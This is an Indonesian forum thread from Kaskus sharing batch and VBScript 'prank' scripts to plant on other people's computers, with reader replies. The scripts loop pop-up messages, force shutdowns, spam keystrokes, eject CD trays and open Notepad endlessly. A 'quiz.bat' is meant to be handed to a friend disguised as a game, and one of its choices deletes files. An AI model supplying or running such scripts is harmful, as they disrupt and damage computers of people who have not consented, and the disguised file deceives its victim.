alexa-tracking

[JAHIL] Dengan Script Notepad

Main Content

1024
1024
KASKUS
51
244
https://www.kaskus.co.id/thread/000000000000000008951567/jahil-dengan-script-notepad
[JAHIL] Dengan Script Notepad
sorry banget gan klo emoticon-Purple Repost mohon jangan emoticon-Blue Guy Bata (L)


Trik ini bisa kita pakai, untuk menjahili computer seseorang gan. Yang harus agan siapin adalah Program Notepad. Dan copy script di bawah ke dalam notepad.

1.message yang nongol melulu
@ECHO off
:Begin
msg * muka agan jelek
msg * ngaca dulu gih
msg * hayo lo gan,cpu ente ane acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

save namafile.BAT

2.bikin shutdown+message
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka agan standar abis"
save namafile.BAT


3.Mainin Caps Lock button
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save namafile.vbs

4.buka tutup CD/DVD
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile.vbs

5.bikin vbscript nongol melulu
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save namafile.vbs


6.tekan tombol backspace melulu
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

save namafile.vbs

7.otomatis ngetik "agan jelek banget sih" di notepad/word
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "agan jelek banget sih!!!"
loop

save namafile.vbs

8.buka notepad trus menerus
@ECHO off
:top
START %SystemRoot%\system32
otepad.exe
GOTO top

save namafile.BAT

9.otomatis buka notepad lalu ngetik apa yg agan mau
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys "gan "
WScript.Sleep 50
WshShell.SendKeys "ma"
WScript.Sleep 50
WshShell.SendKeys "ho"
WScript.Sleep 50
WshShell.SendKeys " ba"
WScript.Sleep 50
WshShell.SendKeys "ng"
WScript.Sleep 50
WshShell.SendKeys "et"
WScript.Sleep 50
WshShell.SendKeys " d"
WScript.Sleep 50
WshShell.SendKeys "e"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

save namafile.vbs

scrip tambahan
@echo off
title quiz hari ini emoticon-Smilie
:menu
cls
echo jika agan kena virus apa yang agan lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka agan jelek sih
msg * ngaca dulu gih
msg * hayo lo gan,cpu ente ane acak2
msg * ud install ulang aja
msg * biar masalah nya kelar, hihihi
@ECHO off
:top
START %SystemRoot%\system32
otepad.exe
GOTO top

nah script diatas save jadi quiz.bat kasih ke temen..

ane ga tanggungjawap klo ada ape2 lho gan, sekedar share ajah... emoticon-Ngakak

Spoiler for jangan dibuka:




Sebagai Kaskuser Yang Baik Budayakan Komeng Gan

Jangan Lupa Rate Gan
[JAHIL] Dengan Script Notepad

Gak Nolak Klo Dikasih
[JAHIL] Dengan Script Notepad


nih tambahan dari yg lain

Quote:


lebih lengkapnya gini gan
tekan CTRL+ALT+DEL di dektop lalu click tab procees manager lalu cari tulisan "java script" lalu click tulisan itu and then click tombol "end procees" nanti tinggal OK.

Quote:


Quote:



nice share gan emoticon-thumbsup

ane juga berterima kasih sama agan aryakuzayang udah nimpuk cendol pertama buat ane emoticon-2 Jempol

Quote:

Mampir Ke Trit Keren Gan

Quote:
wkwkwk.. TSnya jelek banget, muka agan standar abis..
nih **** jangan banyak2 emoticon-Big Grin
emoticon-Ngakak Trik yang bagus buat jailin orang nih emoticon-Ngakak
Nice Info Gan emoticon-Rate 5 Star
sekalian ajarin cara matiinnya gan , nanti kalo yang gak tau malah bingung ....
Dah tau gan.....


Tp mantab lah gan,emoticon-I Love Indonesia
Iye gan, cara matiin tuh gmana yee?emoticon-Bingung
[JAHIL] Dengan Script Notepad
kan ane dah bilang gan

"ane ga tanggungjawap klo ada ape2 lho gan, sekedar share ajah..." emoticon-Ngakak

restart aja gan tuh kompi, beres dah... emoticon-I Love Kaskus
Quote:


Quote:


tararengkyu buat rate nya gan...emoticon-Kiss cendolnya jg dong :maho
ngga ngefek tuh gan?
Quote:


emoticon-Rate 5 Star emang belum cukup gan ? emoticon-Hammer (S)
Abu-abu dah ntar ane kasih emoticon-Ngakak (S) emoticon-Hammer (S) emoticon-Peace
Quote:


belajar lagi gan.,..:maho
emoticon-Ngakak
wah si agan parah bener ni emoticon-Hammer2
emoticon-Ngakak gw pengen test di laptop sendiri takut kenapa'' laptopnya gan emoticon-Stick Out Tongue
Ijin bookmark gan emoticon-Big Grin
bisa aja agan neh..sekarang mo restart kompi tapi masi download gan emoticon-Frown
wah masa sih,,,, ijin praktek yaw....
wahhh ntar kalo abis restart kompinya gak balik gmn gan emoticon-Bingung
jahil mah ente gan,,, emoticon-Cool
wah,,scriptnya banyak yang seperti ID ane emoticon-Malu (S)
nice joke